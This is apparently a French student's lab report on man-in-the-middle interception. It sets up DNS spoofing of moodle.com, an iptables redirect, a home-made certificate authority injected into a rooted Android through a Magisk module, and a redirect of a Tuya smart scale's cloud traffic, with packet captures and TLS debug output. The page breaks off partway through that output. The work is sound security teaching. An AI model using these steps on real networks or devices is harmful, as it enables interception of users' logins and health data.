</syntaxhighlight>Après cela, on retourne sur notre serveur virtuel et on y implémente un serveur DHCP pour l'attribution des IP aux machines se connectant sur le routeur. On retrouve cette configuration dans <code>/etc/dhcp/dhcpd.conf</code><syntaxhighlight lang="linux-config">
# dhcpd.conf

option domain-name "plil.info";
option domain-name-servers ns.plil.info;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style none;

authoritative;

subnet 172.16.10.0 netmask 255.255.255.0 {
range 172.16.10.100 172.16.10.200;
option domain-name-servers 172.16.10.1;
option routers 172.16.10.1;
default-lease-time 600;
max-lease-time 7200;
}
</syntaxhighlight>Puis, on implémente un serveur DNS minimal dans le fichier <code>/etc/bind/named.conf.options</code><syntaxhighlight lang="linux-config">
options {
directory "/var/cache/bind";

recursion yes;
allow-query {172.16.10.0/24; 127.0.0.1;};

forwarders {
8.8.8.8;
1.1.1.1;
};

dnssec-validation auto;

listen-on {127.0.0.1; 172.16.10.1;};
listen-on-v6 { none; };
};
</syntaxhighlight>Et enfin, on met en place une mascarade entre le VLAN 410 et le routeur du réseau des salles de projets pour donner l'accès à Internet.<syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

= Interception de flux (30/09) =

== Redirection par DNS ==
Pour cette partie, on va ajouter une zone primaire à notre serveur DNS avec le nom Internet du site que l'on veut rediriger vers notre machine.

Ici, ce sera le merveilleux <code>moodle.com</code>

D'abord, on modifie <code>/etc/bind/named.conf.local</code><syntaxhighlight lang="linux-config">
//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "moodle.com" {
type master;
file "/etc/bind/db.moodle.com";
};
</syntaxhighlight>Puis, on crée la fameuse zone <code>db.moodle.com</code> dans le même répertoire <syntaxhighlight lang="linux-config">
$TTL 200
@ IN SOA ns.moodle.com. admin.moodle.com. (
5 ;
3600 ;
1800 ;
604800 ;
86400 ;
)
IN NS ns.moodle.com.
ns IN A 172.16.10.1
@ IN A 172.16.10.1
www IN CNAME ns
</syntaxhighlight>Pour vérifier si notre configuration est correcte, on exécute ces deux commandes :

<code>sudo named-checkconf</code>

<code>sudo named-checkzone moodle.com /etc/bind/db.moodle.com</code>

== Redirection réseau ==
Dans cette partie, on ajoute une règle <code>iptables</code> pour rediriger le flux TCP vers un port local, le <code>8080</code>.

<code>iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-ports 8080</code><syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 REDIRECT 6 -- eth0 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 redir ports 8080

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

== Serveur apache sécurise (04/10) ==

Dans un premier temps, on va créer un certificat auto-signé :

<code>openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/apache/apache-selfsigned.key -out /etc/ssl/apache/apache-selfsigned.crt -subj "/C=FR/ST=Nord/L=Lille/O=Popo/CN=moodle.com"</code>

Puis, on configure <code>Apache2</code>
<syntaxhighlight lang="linux-config">
GNU nano 7.2 /etc/apache2/sites-available/secure-site.conf
<VirtualHost *:443>
ServerName moodle.com

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/apache/apache.crt
SSLCertificateKeyFile /etc/ssl/apache/apache.key

# Optionnel : log
ErrorLog ${APACHE_LOG_DIR}/ssl-error.log
CustomLog ${APACHE_LOG_DIR}/ssl-access.log combined
</VirtualHost>

# Redirection HTTP ^f^r HTTPS
<VirtualHost *:80>
ServerName moodle.com
Redirect permanent / https://moodle.com/
</VirtualHost>
</syntaxhighlight>

Maintenant, en prévision de la suite (voir explication dans Machine virtuelle Android), on va créer une autorité de certification nommée CertiFiable :

<code>openssl req -x509 -new -nodes -keyout ca.key -sha256 -days 365 -out ca.crt -subj "/CN=CertiFiable"</code>

Puis, on vient générer une demande de signature de certificat :

<code>openssl req -new -newkey rsa:2048 -nodes -keyout apache.key -out apache.csr -subj "/CN=moodle.com"</code>

Enfin, on vient signer le site avec le certificat de CertiFiable :

<code>openssl x509 -req -in apache.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out apache.crt -days 365 -sha256</code>

= Machine virtuelle <code>android</code> =

== Première tentative ==
Actuellement, si on navigue sur internet et que l'on se rend sur moodle.com, on atterrit bien sûr le faux Moodle, mais comme le téléphone ne connait pas l'autorité de certification nommé CertiFiable, on a le droit à ce magnifique message de connexion non sécurisée :

[[Fichier:Avertissement moodle.png|sans_cadre]][[Fichier:Moodle le magnifique.png|sans_cadre]]

Malheureusement, il est aujourd'hui impossible d'ajouter facilement une autorité de certification sur son téléphone.

C'est pour cela qu'une solution proposée est d'installer une machine virtuelle d'une ancienne version d'<code>Android</code> où il était possible d'en ajouter.

En ayant suivi ce tuto (https://help.clouding.io/hc/en-us/articles/4405454393756-How-to-virtualize-Android-with-QEMU-KVM), j'ai réussi à installer une VM sur Zabeth4 (j'ai dû prendre une autre iso car celle du site était inaccessible).

J'ai installé <code>VNC Viewer</code> pour pouvoir manipuler la machine virtuelle.

En étant sur la VM, j'ai pu me rendre compte qu'il n'était pas possible de se connecter au WiFi, c'est la connexion du pc qui est simulé comme un réseau WiFi dans la VM.

J'ai pu réfléchir à deux solutions avant que la VM ne crash d'elle-même et soit impossible à redémarrer...

La première est toute simple, connecter la Zabeth directement au WiFi, ce qui est difficile à distance. La seconde, qui est je pense possible, est de changer la carte réseau dans les fichiers de conf de la VM pour mettre celle supportant le WiFi.

Je n'ai donc pu tester aucune de ces deux solutions, la VM n'étant plus.

== Seconde tentative ==

qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw

qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw -cdrom *android-x86*.iso -boot d

qemu-system-x86_64 -m 2048 -enable-kvm -cpu host -smp 2 -display sdl -drive file=android.img,format=raw,if=virtio -usb -device usb-host,vendorid=0x148f,productid=0x5370

== Ultime tentative ==
Cette fois ci j'utilise l'application Android Studio qui permet d'émuler des téléphones Android pour le débogage d'application. On va donc s'en servir pour créer un Android routé qui va recevoir notre certificat.

Dans un premier temps j'ai donc routé mon téléphone avec l'utilitaire Magisik en suivant ce tutoriel : https://www.youtube.com/watch?v=QzsNn3GhYYk&t=374s.

Puis je viens ajouter un module dans Magisk qui permet de recharger à chaque demarrage du téléphone le certificat en question.

Le certificat peut être ajouter dans le téléphone en utilisant la commande <code>adb push xyzxyzxyz.0</code> .

La manipulation est la suivante :<syntaxhighlight lang="linux-config">
adb shell
su
cd /data/adb/modules/
mkdir -p tuya_cert/system/etc/security/cacerts
echo "id=tuya_cert" > tuya_cert/module.prop echo "name=Tuya Certificate Injection" >> tuya_cert/module.prop echo "version=1.0" >> tuya_cert/module.prop echo "versionCode=1" >> tuya_cert/module.prop echo "author=Victo" >> tuya_cert/module.prop echo "description=Injecte le certificat Tuya dans le systeme" >> tuya_cert/module.prop
touch tuya_cert/auto_mount
cp /sdcard/Download/26e33623.0 /data/adb/modules/tuya_cert/system/etc/security/cacerts/
chmod 644 /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
chown root:root /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
reboot
</syntaxhighlight>On a donc maintenant une VM Android avec notre certificat. Il faut maintenant que le PC qui host cette VM soit connecté à notre borne WiFi pour pouvoir constater que notre site Moodle.com est bien redirigé et sécurisé.

= Machine <code>Android</code> (06/10) =
Pour cette dernière partie, j'ai retrouvé une tablette sous <code>Android 4.4 KitKat</code> qui permet d'ajouter des autorités de certification.

C'est donc ce que j'ai fait :

[[Fichier:Photo_certifiable.png|sans_cadre]]

Maintenant, on constate en se connectant sur moodle.com à partir de cette tablette que l'on est bien redirigé vers le faux site et qu'il est sécurisé avec le magnifique cadenas vert.

[[Fichier:Photo moodle.png|sans_cadre]]

(cette page web date du 06/10/25, elle n'est plus valable depuis le 10/10/25...)

= Nedis Wi-Fi Smart Personal Scales =

Dans ce second TP, nous allons jouer avec ce pèse personne de nedis.

Dans un premier temps, j'ai connecté la balance au réseau SE5-SSID10.

Puis j'ai remarqué que quand je tentais de me peser, la balance affichait err2.

Après une courte investigation, il s'agit d'une balance qui émet des signaux électriques pour analyser la composition corporelle donc si on se pèse avec des chaussures, cela pose problème.

Pour la suite du projet, on se pèsera avec les mains.

[[Fichier:Poid_sur_app_nedis.png|sans_cadre]]

== Redirection du poids vers notre serveur ==
Dans un premier temps, mon idée était de faire croire à la balance qu'elle communique effectivement avec son serveur pour pouvoir récupérer les informations sur la santé de l'utilisateur.

Ici on constate sur ces paquets la requête de la balance pour obtenir une IP, puis le moment ou elle l'obtient.

[[Fichier:WS connection balance.png|sans_cadre|858x858px]]

Je peux donc ping ma balance depuis mon pc (celui qui host ma VM android)

[[Fichier:PIng balance.png|sans_cadre]]

Maintenant je veux voir les messages de communication entre la balance, son serveur et l'application, pour ce faire je fais <code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">
14:46:51.115996 IP 172.16.10.105.49153 > 172.16.10.1.53: 13861+ A? m2.tuyaeu.com. (31)
14:46:51.125611 IP 172.16.10.1.53 > 172.16.10.105.49153: 13861 3/0/0 A 3.120.92.134, A 18.184.31.90, A 35.156.44.172 (79)
14:46:51.168250 IP 172.16.10.105.49153 > 172.16.10.1.53: 59035+ A? a3.tuyaeu.com. (31)
14:46:51.177967 IP 172.16.10.1.53 > 172.16.10.105.49153: 59035 3/0/0 A 18.198.62.99, A 18.158.227.228, A 3.67.116.46 (79)
14:46:51.703179 IP 172.16.10.102.57661 > 172.16.10.1.53: 30982+ AAAA? a1.tuyaeu.com. (31)
14:46:51.706085 IP 172.16.10.102.57662 > 172.16.10.1.53: 15654+ A? a1.tuyaeu.com. (31)
14:46:51.713159 IP 172.16.10.1.53 > 172.16.10.102.57661: 30982 3/0/0 AAAA 2a05:d014:afa:af02:262a:be09:e328:ff21, AAAA 2a05:d014:afa:af01:87dc:dc67:35a1:5bfe, AAAA 2a05:d014:afa:af00:1ee2:1f00:e061:e8bf (115)
14:46:51.715736 IP 172.16.10.1.53 > 172.16.10.102.57662: 15654 3/0/0 A 3.78.92.3, A 35.159.150.3, A 3.121.33.91 (79)

56 packets captured
56 packets received by filter
0 packets dropped by kernel
[4343449.827028] device eth1 left promiscuous mode

</syntaxhighlight>visiblement notre balance communique avec tuya via m2.tuyaeu.com et a3.tuyaeu.com. Par la suite on constate qu'elle communique avec une multitude de XY.tuyaeu.com.

Maintenant on refait une config similaire à moodle.com, une zone "tuyaeu.com" dans le fichier de conf de bind, un fichier db.tuyaeu.com et une page apache. Enfin on vient la signer avec notre autorité de certification.

<code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">

12:30:58.490060 IP 172.16.10.105.49153 > 172.16.10.1.53: 50294+ A? m2.tuyaeu.com. (31)
12:30:58.490174 IP 172.16.10.1.53 > 172.16.10.105.49153: 50294* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:30:58.540041 IP 172.16.10.105.49153 > 172.16.10.1.53: 23785+ A? a3.tuyaeu.com. (31)
12:30:58.540132 IP 172.16.10.1.53 > 172.16.10.105.49153: 23785* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)

</syntaxhighlight>Maintenant on constate que quand la balance demande l'adresse du serveur xy.tuyaeu.com, notre DNS lui répond avec l'IP de notre serveur.

//TO DO

tcpdump -i eth1 host 172.16.10.105 and not port 53 -A<syntaxhighlight lang="linux-config">
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes
12:36:41.148741 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4......<\)...........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....X..........
.....
.. plil.info................
12:36:41.161323 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4g.....[.}T..........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....X..........
.....
.. plil.info................
12:36:41.167616 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i....P....Y...c....
12:36:41.490919 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i.r.u....).........
12:36:41.993612 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i..HE.....f........
12:36:42.011664 ARP, Request who-has 172.16.10.1 tell 172.16.10.105, length 46
..........|.-L..
i........
.....up. ..........
12:36:42.011672 ARP, Reply 172.16.10.1 is-at 00:16:3e:23:74:42 (oui Unknown), length 28
..........>#tB..
...|.-L..
i
12:36:42.019053 IP 172.16.10.105.3872 > 172.16.10.1.8886: Flags [S], seq 6509, win 4380, options [mss 1460], length 0
E..,......O>..
i..
.. "....m....`....<........
12:36:42.019100 IP 172.16.10.1.8886 > 172.16.10.105.3872: Flags [R.], seq 0, ack 6510, win 0, length 0
E..(..@.@..E..
...
i".. .......nP.......
12:36:42.070419 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [S], seq 6509, win 4380, options [mss 1460], length 0
E..,......O<..
i..
.B......m....`...........<.
12:36:42.070442 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [S.], seq 3767910189, ack 6510, win 64240, options [m
ss 1460], length 0
E..,..@.@..A..
...
i..B....-...n`...l.......
12:36:42.077437 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [.], ack 1, win 4380, length 0
E..(......O?..
i..
.B......n....P...4......
..
12:36:42.079986 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [P.], seq 1:68, ack 1, win 4380, length 67
E..k......N...
i..
.B......n....P...........>...:..BAohBAohbmd6aG91IFR1eVjaG5vbG9SB........................
12:36:42.080012 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [.], ack 68, win 64173, length 0
E..(..@.@.....
...
i..B.........P...l...
12:36:42.080447 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [P.], seq 1:8, ack 68, win 64173, length 7
E../..@.@.....
...
i..B.........P...l.........(
12:36:42.080533 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [F.], seq 8, ack 68, win 64173, length 0
E..(..@.@.....
...
i..B....5....P...l...
12:36:42.101652 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [.], ack 8, win 4373, length 0
E..(. ....O<..
i..
.B..........5P...4s........
12:36:42.102116 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [R.], seq 68, ack 8, win 4380, length 0
E..(.
....O;..
i..
.B..........5P...4h.....
..
12:36:43.025368 IP 172.16.10.105.23869 > 172.16.10.1.8886: Flags [S], seq 6511, win 4380, options [mss 1460], length 0
E..,......O6..
i..
.]="....o....`............9
12:36:43.025387 IP 172.16.10.1.8886 > 172.16.10.105.23869: Flags [R.], seq 0, ack 6512, win 0, length 0
E..(..@.@..E..
...
i".]=.......pP.......
12:36:44.025225 IP 172.16.10.105.22317 > 172.16.10.1.8886: Flags [S], seq 6513, win 4380, options [mss 1460], length 0
E..,......O5..
i..
.W-"....q....`....+........
12:36:44.025269 IP 172.16.10.1.8886 > 172.16.10.105.22317: Flags [R.], seq 0, ack 6514, win 0, length 0
E..(..@.@..E..
...
i".W-.......rP.......
12:36:45.025301 IP 172.16.10.105.31465 > 172.16.10.1.8886: Flags [S], seq 6517, win 4380, options [mss 1460], length 0
E..,......O4..
i..
.z."....u....`...ck......E.
12:36:45.025318 IP 172.16.10.1.8886 > 172.16.10.105.31465: Flags [R.], seq 0, ack 6518, win 0, length 0
E..(..@.@..E..
...
i".z........vP....0..
12:36:46.025500 IP 172.16.10.105.9070 > 172.16.10.1.8886: Flags [S], seq 6521, win 4380, options [mss 1460], length 0
E..,......O3..
i..
.#n"....y....`.............
12:36:46.025517 IP 172.16.10.1.8886 > 172.16.10.105.9070: Flags [R.], seq 0, ack 6522, win 0, length 0
E..(..@.@..E..
...
i".#n.......zP.......
12:36:47.033189 IP 172.16.10.105.51179 > 172.16.10.1.8886: Flags [S], seq 6527, win 4380, options [mss 1460], length 0
E..,......O2..
i..
...".........`...._......y.
12:36:47.033206 IP 172.16.10.1.8886 > 172.16.10.105.51179: Flags [R.], seq 0, ack 6528, win 0, length 0
E..(..@.@..E..
...
i"...........P...?$..
12:36:47.263020 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:48.287049 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:48.653641 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4B...................
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....Q..........
.....
.. plil.info................
12:36:48.663352 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4.L.......p..........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....Q..........
.....
.. plil.info................
12:36:48.674677 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i>#tB./..P.........
12:36:48.993649 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
ir...P.............
12:36:49.311055 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:49.490922 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i.......x....D.....
12:36:49.492262 ARP, Reply 172.16.10.105 is-at a4:e5:7c:16:2d:4c (oui Unknown), length 46
..........|.-L..
i..>#tB..
...................
12:36:49.515651 IP 172.16.10.105.29415 > 172.16.10.1.8886: Flags [S], seq 6536, win 4380, options [mss 1460], length 0
E..,......O...
i..
.r.".........`...kZ........
12:36:49.515669 IP 172.16.10.1.8886 > 172.16.10.105.29415: Flags [R.], seq 0, ack 6537, win 0, length 0
E..(..@.@..E..
...
i".r.........P.......
12:36:49.518628 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [S], seq 6539, win 4380, options [mss 1460], length 0
E..,......O-..
i..
.z]..........`.............
12:36:49.518648 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [S.], seq 1378912894, ack 6540, win 64240, options [m
ss 1460], length 0
E..,..@.@..A..
...
i..z]R0.~....`...l.......
12:36:49.523505 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [.], ack 1, win 4380, length 0
E..(......O0..
i..
.z]......R0..P........a3.tu
12:36:49.527055 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [P.], seq 1:68, ack 1, win 4380, length 67
E..k......N...
i..
.z]......R0..P...G?......>...:..BAohBAohbmd6aG91IFR1eVjaG5vbG9SB........................
12:36:49.527081 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [.], ack 68, win 64173, length 0
E..(..@.@..X..
...
i..z]R0......P...l...
12:36:49.527462 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [P.], seq 1:8, ack 68, win 64173, length 7
E../..@.@..P..
...
i..z]R0......P...l.........(
12:36:49.527530 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [F.], seq 8, ack 68, win 64173, length 0
E..(..@.@..V..
...
i..z]R0......P...l...
12:36:49.569636 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [.], ack 8, win 4373, length 0
E..(......O...
i..
.z]......R0..P..........C.@
12:36:49.574893 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [R.], seq 68, ack 8, win 4380, length 0
E..(......O-..
i..
.z]......R0..P..........
..
12:36:50.310055 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i........ ....>....
12:36:53.526624 IP 172.16.10.105.48314 > 172.16.10.1.8886: Flags [S], seq 6547, win 4380, options [mss 1460], length 0
E..,......O&..
i..
...".........`...!|........
12:36:53.526669 IP 172.16.10.1.8886 > 172.16.10.105.48314: Flags [R.], seq 0, ack 6548, win 0, length 0
E..(..@.@..E..
...
i"...........P...JA..
12:36:54.536817 IP 172.16.10.105.44185 > 172.16.10.1.8886: Flags [S], seq 6567, win 4380, options [mss 1460], length 0
E..,......O%..
i..
...".........`...1.........
12:36:54.536835 IP 172.16.10.1.8886 > 172.16.10.105.44185: Flags [R.], seq 0, ack 6568, win 0, length 0
E..(..@.@..E..
...
i"...........P...ZN..
12:36:55.545631 IP 172.16.10.105.26626 > 172.16.10.1.8886: Flags [S], seq 6589, win 4380, options [mss 1460], length 0
E..,......O$..
i..
.h.".........`...v
........
12:36:55.545649 IP 172.16.10.1.8886 > 172.16.10.105.26626: Flags [R.], seq 0, ack 6590, win 0, length 0
E..(..@.@..E..
...
i".h.........P.......
12:36:56.554680 IP 172.16.10.105.16244 > 172.16.10.1.8886: Flags [S], seq 6611, win 4380, options [mss 1460], length 0
E..,......O#..
i..
.?t".........`.............
12:36:56.554698 IP 172.16.10.1.8886 > 172.16.10.105.16244: Flags [R.], seq 0, ack 6612, win 0, length 0
E..(..@.@..E..
...
i".?t........P....G..
^C
57 packets captured
57 packets received by filter
0 packets dropped by kernel
</syntaxhighlight>port 8886 chez tuya ?

<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# openssl s_server -accept 8886 -cert /etc/ssl/apache/ca.crt -key /etc/ssl/apache/ca.key -debug
Using default temp DH parameters
ACCEPT
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 00 00 00 00 d6aG91IFR1eV....
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 00 ...:..BAohBAohb.
0010 - 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 00 00 00 00-00 00 00 00 00 00 00 00 d6aG............
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
